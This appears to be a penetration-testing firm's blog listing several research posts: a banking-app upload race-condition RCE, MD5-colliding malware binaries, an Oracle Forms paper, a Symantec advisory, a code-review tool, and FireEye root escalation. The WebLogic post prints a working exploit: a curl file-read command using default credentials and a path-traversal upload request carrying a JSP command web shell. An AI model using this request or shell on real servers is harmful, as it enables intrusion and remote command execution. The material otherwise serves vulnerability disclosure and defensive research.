Finding the salt with SQL inception

Introduction

Web application penetration testing is a well researched area with proven tools and methodologies. Still, new techniques and interesting scenarios come up all the time that create new challenges even after a hundred projects.

In this case study we start with a relatively simple blind SQL injection situation and show how this issue could be exploited in a way that made remote code execution possible. The post will also serve as a reference for using Duncan, our simple framework created to facilitate blind exploitation.

Continue reading Finding the salt with SQL inception

Virtual Bank Robbery – In Real Life

Introduction

This week a Polish bank was breached through its online banking interface. According to the reports the attacker stole 250.000 USD and now uses the personal information of 80.000 customers to blackmail the bank. Allegedly the attacker exploited a remote code execution vulnerability in the online banking application to achieve all this.

We at Silent Signal performed penetration tests on numerous online banking applications, and can say that while these systems are far from flawless, RCE vulnerabilities are fairly rare. Accordingly, the majority of the in-the-wild incidents can be traced back to the client side, to compromised browsers or naive users.

But from time to time we find problems that could easily lead to incidents similar to the aforementioned Polish banks. In this case-study we’re describing a remote code execution vulnerability we discovered in an online banking application. The vulnerability is now fixed, the affected institution was not based in Poland (or our home country, Hungary).

The bug

The online bank testing account had access to an interface where users could upload various files (pictures, HTML files, Office documents, PDFs etc.). The upload interface checked the MIME type of the uploaded documents only (from the Content-Type header), but not the extension. The Content-Type header is user controlled, so uploading a public ASPX shell was an obvious way to go; but after the upload completed I got an error message that the uploaded file was not found and the message revealed the full path of the missing file on the servers filesystem. I was a bit confused because I could not reproduce this error with any other files I tried to upload. I thought it was possible that an antivirus was in place that removes the malicious document before the application could’ve handled it.
I uploaded a simple text file with the EICAR antivirus test string with .docx extension(so I could make sure that the extension wasn’t the problem) that verified this theory. The antivirus deleted the file before the application could parse it that resulted in an error message revealing the full path:
EICAR

This directory was reachable from the web and the prefix of the file name was based on the current “tick count” of the system. The biggest problem was that the application removed the uploaded files after a short period of time because this was only a temporary directory. I could also only leak the names of deleted files but not the ones that remained on the system for a longer time. So exploitation required a bit more effort.

The Exploit

Before going into the details of the exploit, let’s see what “primitives” I had to work with:

  • I can upload a web shell (antivirus evasion is way too easy…)
  • I can leak the tick count by uploading an EICAR signature
  • I can access my web shell if I’m fast enough and know the tick count of the server at the moment the shell was uploaded

Unfortunately I can’t do these three things at the same time, so this is a kind of a race condition situation. According to the documentation “a single tick represents one hundred nanoseconds or one ten-millionth of a second” so guessing the tick count on a remote system through the Internet seems like a really though job. Luckily, I don’t always trust the documentation ;)

I built a simple test application that models the primitives described and implemented a simple time synchronization algorithm that I used before to predict time on remote servers with seconds precission. The algorithm works basically by making guesses and adjusting them based on the differentials to the actual reported server times.

While this algorithm wasn’t effective on the 100ns scale, the results were really interesting! I could observe that:

  1. Parallel requests result in identical tick counts with high probability
  2. The lower bits of the tick counts tend to represent the same few values

The reason for this is probably that the server processes are not truly parallel, just the OS scheduler makes you believe they are and that the resolution of the tick counter is imperfect. I also found out, that since the filenames are only dependent on the time my requests arrive to the application, the delays of the responses introduce avoidable uncertainty.

My final solution is based on grequests that is an awesome asynchronous HTTP library for Python. This allows me to issue requests very fast without having to wait for the answers in between. I’m using two parallel threads. The first uploads a number of web shells as fast as it can, while the other issues a number of requests with the EICAR string and then tries to access the web shells at constant offsets from the retrieved tick counts. The following chart shows the average hit rates (%) as the server side delays between the creation and deletion of the uploads changes:

avg_tick_hits

And although a few percent doesn’t seem high, don’t forget that I had to only be lucky once! As you can see there is a limit for exploitability (with this setup) between 300 ms and 400 ms but as we later found out the uploads were transferred to a remote host, so the lifetime of the temporary files was above this limit turning the application exploitable.

The model application and the test exploit is available on GitHub.

Conclusion

In this case-study we demonstrated how a low impact information leak and a (seemingly) low exploitability file upload bug could be chained together to an attack that can result in significant financial and reputation loss.

For application developers we have the following advises:

  • If you’re in doubt, use cryptographicaly secure random number generators.
  • Never assume that your software will be deployed to an environment similar to your test machine. A conflicting component (like the antivirus in this case) can and will cause unexpected behavior.
  • File uploads are always fragile parts of web applications, OWASP has some good guidelines about securely handling them.

And for those who are responsible for online banks or similar systems here are some thought-provoking questions:

  • Do your development teams follow a security focused development methodology? Because a good methodology is the base of a quality product.
  • Do you perform regular, technical security tests on your financial applications? Because people make mistakes.
  • Do you fix the discovered vulnerabilities on your production systems in reasonable time? Because tests worth nothing if it takes forever to fix the findings.
  • Do you have an incident response plan? Because despite all effort, incidents will eventually happen.
  • Would you notice an incident? Because IR doesn’t get started by itself.
  • Could you determine what the exploited vulnerabilities were and which users exploited (or tried to exploit) them? Because an incident is an opportunity to learn.

Poisonous MD5 – Wolves Among the Sheep

MD5 is known to be broken for more than a decade now. Practical attacks have been shown since 2006, and public collision generator tools are also available since that time. The dangers of the developed collision attacks were demonstrated by academia and white-hat hackers too, but in case of the Flame malware we’ve also seen malicious parties exploiting the weaknesses in the wild.

And while most have already moved away from MD5, there is still a notable group that heavily uses this obsolete algorithm: security vendors. It seems that MD5 became the de-facto standard of fingerprinting malware samples and the industry doesn’t seem to be willing to move away from this practice. Our friend Zoltán Balázs collected a surprisingly long list of security vendors using MD5, including the biggest names of the field.

The list includes for example Kaspersky, the discoverer of Flame who just recently reminded us that MD5 is dead, but just a few weeks earlier released a report including  MD5 fingerprints only – ironically even the malware they analysed uses SHA-1 internally…

And in case you think that MD5 “good enough” for malware identification let’s take another example. The following picture shows the management console of a FireEye MAS – take a good look at the MD5 hases, the time delays and the status indicators:

fireeye_duplicateDownload sample files

As you can see, binaries submitted for analysis are identified by their MD5 sums and no sandboxed execution is recorded if there is a duplicate (thus the shorter time delay). This means that if I can create two files with the same MD5 sum – one that behaves in a malicious way while the other doesn’t – I can “poison” the database of the product so that it won’t even try to analyze the malicious sample!

After reading the post of Nat McHugh about creating colliding binaries I decided to create a proof-of-concept for this “attack”. Although Nat demonstrated the issue with ELF binaries, the concept is basically the same with Windows (PE) binaries that security products mostly target. The original example works by diverting the program execution flow based on the comparison of two string constants. The collision is achieved by adjusting these constants so that they match in one case, but not in the other.

My goal was to create two binaries with the same MD5 hash; one that executes arbitrary shellcode (wolf) and another that does something completely different (sheep). My implementation is based on the earlier work of Peter Selinger (the PHP script by Nat turned out to be unreliable across platforms…), with some useful additions:

  • A general template for shellcode hiding and execution;
  • RC4 encryption of the shellcode so that the real payload only appears in the memory of the wolf but not on the disk or in the memory of the sheep;
  • Simplified toolchain for Windows, making use of Marc Stevens fastcoll (Peter used a much slower attack, fastcoll reduces collision generation from hours to minutes);

The approach may work with traditional AV software too as many of these also use fingerprinting (not necessarily MD5) to avoid wasting resources on scanning the same files over and over (although the RC4 encryption results in VT 0/57 anyway…). It would be also interesting to see if “threat intelligence” feeds or reputation databases can be poisoned this way.

The code is available on GitHub. Please use it to test the security solutions in your reach and persuade vendors to implement up-to-date algorithms before compiling their next marketing APT report!

For the affected vendors: Stop using MD5 now! Even if you need MD5 as a common denominator, include stronger hashes in your reports, and don’t rely solely on MD5 for fingerprinting!

Testing Oracle Forms

SANS Institute accepted my GWAPT Gold Paper about testing Oracle Forms applications, the paper is now published in the Reading Room.

Forms is a typical example of proprietary technology that back in the day might have looked a good idea from business perspective but years later causes serious headaches on both the operational and security sides:

  • Forms uses naively implemented crypto with (effectively) 32-bit RC4
  • The key exchange is trivial to attack to achieve full key recovery
  • Bit-flipping is possible since no integrity checking is implemented
  • Database password set at server side is sent to all clients (you read that correctly)

And in case you’re wondering: applications based on Oracle Forms are still in use, thanks to vendor lock-in…

The full Gold Paper can be downloaded from the website of SANS Institute:

Automated Security Testing of Oracle Forms Applications

The accompanying code is available on GitHub.

CVE-2014-3440 – Symantec Critical System Protection Remote Code Execution

Today we release the details of CVE-2014-3440, a remote code execution vulnerability in Symantec Critical System Protection. You can get the detailed advisory on the following link:

CVE-2014-3440 – Symantec Critical System Protection Remote Code Execution

We reported the vulnerability with the help of Beyond Security, Symantec fixed the vulnerability on 19.01.2015. Although we didn’t manage to get a nice logo :) in this blog post we give some additional information regarding the issue. This is another example that just like any other software, security products can introduce new security risks to their environment too.

First of all, here’s a short video demonstrating our exploit in action:

The exploit consists of two parts: First we need to register ourselves as an Agent to the SCSP Server. In default installations Agents can be registered without any authentication or prior knowledge. Before the official Symantec advisory was available I asked some of my peers there if this step can be hardened/mitigated somehow, but they couldn’t present any method to do this. Even in case that Agent registration would be somehow restricted, the attack could be executed from a compromised host with an Agent installed.

During the registration we obtain a GUID that allows us to make use of the bulk log upload feature. This feature is affected by a path traversal issue that allows arbitrary file writes leading to RCE. The exploitation method is detailed in our advisory.

Regarding the official workarounds: I actually jiggled when read about placing the log directory to different physical drive, but quickly realized that this is not the first case that software exploitation is mitigated by hardware :) The workaround definitely would work and you only need a different logical partition (not a full physical drive) so the drive letters will be different.

Considering the Prevention policies let’s just say that I studied SCSP to measure the behavioral detection capabilities of different endpoint products, and wasn’t really impressed (by any of the tested products)…

Bonus

While studying SCSP I stumbled upon another interesting thing, that I wouldn’t consider a vulnerability, more like a really strange design decision. In a nutshell, the SCSP management interface allows connecting to different servers and the server list can be edited without authentication. This way an attacker can replace the address of a legitimate server with her own and wait for administrators to log in:

And if you are wondering what that binary thing at the end is, here are some clues:

public byte[] encipherPassword(byte pwd[])
{
    XOREncoding.encode(pwd);
    return pwd;
}
public static void encode(byte data[])
{
    for(int i = 0; i < data.length; i++) data[i] ^= 0x5a;
}

The story of a pentester recruitment

Intro

Last year we decided to expand our pentest team, and we figured that offering a hands-on challenge would be a good filter for possible candidates, since we’ve accumulated quite a bit of experience from organizing wargames and CTF at various events. We provided an isolated network with three hosts and anyone could apply by submitting a name, and email address and a CV – we’ve sent VPN configuration packs to literally everyone who did so. These packs included the following message (the original was in Hungarian).

Your task is to perform a comprehensive (!) security assessment of the hosts within range 10.10.82.100-254.

Typical tasks of a professional penetration tester include

  • asking relevant clarifying questions about new projects,
  • writing the technical part of business proposals,
  • comprehensive penetration testing,
  • report writing and presentation.

That is why we decided to test the candidates’ knowledge about the above subjects. The scope of the challenge consisted of 3 servers, report writing and presentation to the technical staff with a time limit of two weeks. Here is our solution:

Continue reading The story of a pentester recruitment

Code Review on the Cheap

At the 31. Chaos Communication Congress I had the pleasure to watch the presentation of Fabian Yamaguchi about the code analysis platform Joern. I’ve heard about this tool before at Hacktivity but this time I could have deeper view on the internals and the capabilities of the software that inspired me to clean up and release some piece of code I used for some years in code review projects.

My idea was quite similar to the one of Fabs: Recognize potentially vulnerable code patterns, and create a tool that is aware of the sytnax in order to look for the anomalies in the source efficiently. Yes, I could use regular expressions and grep, but  eventually I faced several problems like:

  • Ugly source code 
  • Keywords inside comments or strings
  • The complexity of the regex itself

Since I have to deal with several different languages I also had to come up with a solution that is easily applicable to new grammars. In the end I settled with a solution somehow between grep and Joern and implemented it in CROTCH (Code Review On The CHeap):

Instead of full-blown parsers CROTCH only uses lexers, which are readily available in all flavors in the Pygments Python package (intended to use for source code highlighting), providing support for almost every language one can think of. Other lexers can also be created very easily – although installing them requires some setuptools-fu. With these lexers we can tokenize the source code, splitting it to meaningful parts and assigning types (like scalar, string, comment, keyword, etc.) to them. This is of course far from having an AST for example, but allows us to start creating small, targeted “mini-parsers” which focus only to the relevant parts of the source.

These “mini-parsers” can be implemented through a general purpose state machine, usually in a few dozen lines of Python. The example provided on GitHub implements a state machine similar to the following to identify simple format string bugs without troubling with most of the grammar:

 printf

We successfully utilized this approach to find bugs in scale from enterprise Java applications to large PL/SQL projects, hope you’ll find CROTCH useful too! As always, issues, feature- and pull requests are welcome on our GitHub!

WebLogic undocumented hacking

During an external pentest – what a surprise – I found a WebLogic server with no interesting contents. I searched papers and tutorials about WebLogic hacking with little success. The public exploitation techniques resulted in only file reading. The OISSG tutorial only shows the following usable file reading solution:

curl -s http://127.0.0.1/wl_management_internal2/wl_management -H "username: 
weblogic" -H "password: weblogic" -H "wl_request_type: file" 
-H "file_name: c:\boot.ini"

You can read the WAR, CLASS, XML(config.xml) and LOG(logs\WeblogicServer.log) files through this vulnerability.
This is not enough because I want run operating system commands. The HACKING EXPOSED WEB APPLICATIONS, 3rd Edition book mentioned an attack scenario against WebLogic, but this was only file read although it was based on a great idea:
The web.xml of wl_management_internal2 defined two servlets, FileDistributionServlet and BootstrapServlet. I downloaded the weblogic.jar file with the mentioned attack and decompiled the FileDistributionServlet.class:

total 128
drwxr-xr-x  2 root root  4096 2014-10-03 14:54 ./
drwxr-xr-x 24 root root  4096 2004-06-29 23:18 ../
-rw-r--r--  1 root root  7073 2004-06-29 23:17 BootstrapServlet$1.class
-rw-r--r--  1 root root  8876 2004-06-29 23:17 BootstrapServlet.class
-rw-r--r--  1 root root  1320 2004-06-29 23:17 BootstrapServlet$MyCallbackHandler.class
-rw-r--r--  1 root root  1033 2004-06-29 23:16 FileDistributionServlet$1.class
-rw-r--r--  1 root root  1544 2004-06-29 23:16 FileDistributionServlet$2.class
-rw-r--r--  1 root root   945 2004-06-29 23:16 FileDistributionServlet$3.class
-rw-r--r--  1 root root   956 2004-06-29 23:16 FileDistributionServlet$4.class
-rw-r--r--  1 root root   927 2004-06-29 23:16 FileDistributionServlet$5.class
-rw-r--r--  1 root root   950 2004-06-29 23:16 FileDistributionServlet$6.class
-rw-r--r--  1 root root 21833 2004-06-29 23:16 FileDistributionServlet.class
-rw-r--r--  1 root root   364 2004-06-29 23:16 FileDistributionServlet$FileNotFoundHandler.class
-rw-r--r--  1 root root 38254 2014-10-03 12:24 FileDistributionServlet.jad
-rw-r--r--  1 root root  1378 2004-06-29 23:16 FileDistributionServlet$MyCallbackHandler.class
root@s2crew:/

The FileDistributionServlet had the following interesting function:

 private void internalDoPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
        throws ServletException, IOException
    {
        String s;
        String s1;
        InputStream inputstream;
        boolean flag;
        String s2;
        String s3;
        boolean flag1;
        s = httpservletrequest.getHeader("wl_request_type");
        httpservletresponse.addHeader("Version", String.valueOf(Admin.getInstance().getCurrentVersion()));
        s1 = httpservletrequest.getContentType();
        inputstream = null;
        Object obj = null;
        flag = true;
        s2 = null;
        s3 = httpservletrequest.getHeader("wl_upload_application_name");
        flag1 = "false".equals(httpservletrequest.getHeader("archive"));
        Object obj1 = null;
        String s4 = null;
        if(s3 != null)
        {
            ApplicationMBean applicationmbean;
            try
            {
                MBeanHome mbeanhome = Admin.getInstance().getMBeanHome();
                applicationmbean = (ApplicationMBean)mbeanhome.getAdminMBean(s3, "Application");
            }
            catch(InstanceNotFoundException instancenotfoundexception)
            {
                applicationmbean = null;
            }
            if(applicationmbean != null)
            {
                File file = new File(applicationmbean.getFullPath());
                s4 = file.getParent();
            }
        }
        if(s4 == null)
        {
            s4 = Admin.getInstance().getLocalServer().getUploadDirectoryName() + File.separator;
            if(s3 != null)
                s4 = s4.concat(s3 + File.separator);
        }
        Object obj2 = null;
        if(s1 != null && s1.startsWith("multipart") && s.equals("wl_upload_request"))
        {
            httpservletresponse.setContentType("text/plain");
            Object obj3 = null;
            try
            {
                MultipartRequest multipartrequest;
                if(httpservletrequest.getHeader("jspRefresh") != null && httpservletrequest.getHeader("jspRefresh").equals("true"))
                {
                    s2 = httpservletrequest.getHeader("adminAppPath");
                    multipartrequest = new MultipartRequest(httpservletrequest, s2, 0x7fffffff);
                } else
                {
                    multipartrequest = new MultipartRequest(httpservletrequest, s4, 0x7fffffff);
                }
                File file1 = multipartrequest.getFile((String)multipartrequest.getFileNames().nextElement());
                s2 = file1.getPath();
                flag = false;
                if(flag1)
                {
                    String s5 = s2.substring(0, s2.lastIndexOf("."));
                    extractArchive(s2, s5);
                    s2 = s5;
                }
----- CUT ------

After the investigating the function, I constructed the following HTTP POST request:

POST /wl_management_internal2/wl_management HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0
Connection: keep-alive
username: weblogic
password: weblogic
wl_request_type: wl_upload_request
wl_upload_application_name: ..\..\..\..\..\..\..\..\..\you_can_define_the_upload_directory
archive: true
Content-Length: XXXX
Content-Type: multipart/form-data; boundary=---------------------------55365303813990412251182616919
Content-Length: 959
-----------------------------55365303813990412251182616919
Content-Disposition: form-data; name="file"; filename="cmdjsp.jsp"
Content-Type: application/octet-stream
// note that linux = cmd and windows = "cmd.exe /c + cmd" 
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
            output += s;
         }
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>
<%=output %>
<!--    http://michaeldaw.org   2006    -->
-----------------------------55365303813990412251182616919--

This is simple as that. The prerequisite of this exploit is the default weblogic/weblogic account.
This is what I call real hacking!

;)

How to get root access on FireEye OS

1. Background

A couple of months ago we had the opportunity to take a closer look at a FireEye AX 5400 malware analysis appliance. The systems of FireEye are famous for catching targeted attacks that tend to evade traditional security systems, so we were really excited to find out more about the capabilities of this system. However we couldn’t resist taking a look at the management interfaces of the system; these turned out to be at least as exciting as our initial area of interest.

2. Technical part

2.1 Escaping the shell

The FireEye AX 5400 provides management interfaces over HTTPS and SSH. After login, the SSH interface provides a special restricted command shell (similar to the consoles of ordinary network equipment) that allows administrators to configure the device but prevents them interacting with the underlying operating system. Aside from the special shell the service was just an ordinary SSH server that allowed limited use of SCP.

The SCP process could only read and write the home directories and couldn’t create directories. If the user initiated an SSH connection to a remote system, the $HOME/.ssh directory was created to store the known_hosts file. After this one could upload an SSH public key to log into the system without password, but the default shell of the account was set to the original configuration shell with limited functionality.

How could we escape this shell completely and run arbitrary commands? The answer lies in the slogin command of the SSH console, which was actually an ordinary SSH client that behaved exactly as expected. This SSH client provides configuration options for the users from the $HOME/.ssh/config file. The ProxyCommand option allows operating system command execution if the user initiates an SSH connection:

Proxy Command - Specifies the command to use to connect to the server. 
The command string extends to the end of the line, and is executed 
with the user's shell.

To obtain access to an unlimited command shell, a configuration file was created that added a new user to the shadow file of the system with the home directory of the root user (that contained the previously uploaded SSH public key), 0 UID and an unlimited default shell. The configuration file contained commands similar to the following:

Adding a new root user

The built-in „slogin” command could trigger this configuration:

Triggering the command execution
The new s2crew user now has an unlimited command shell and can log in with the previously uploaded public key:

Logging into the system

2.2 Afterlife

Having successfully demonstrating the issue, we contacted the vendor who responded instantly, acknowledged the vulnerability and notified us on the status of the fix regularly. The official fix was released on 8th July 2014 for FEOS versions older than 7.1.0.

The exploitability of the issue was limited, since attackers would have to authenticate themselves on an administrative interface that should be only exposed to dedicated network segments. Still, this vulnerability gave us a unique insight to the inner workings of the product that inspired us to continue the research of the platform.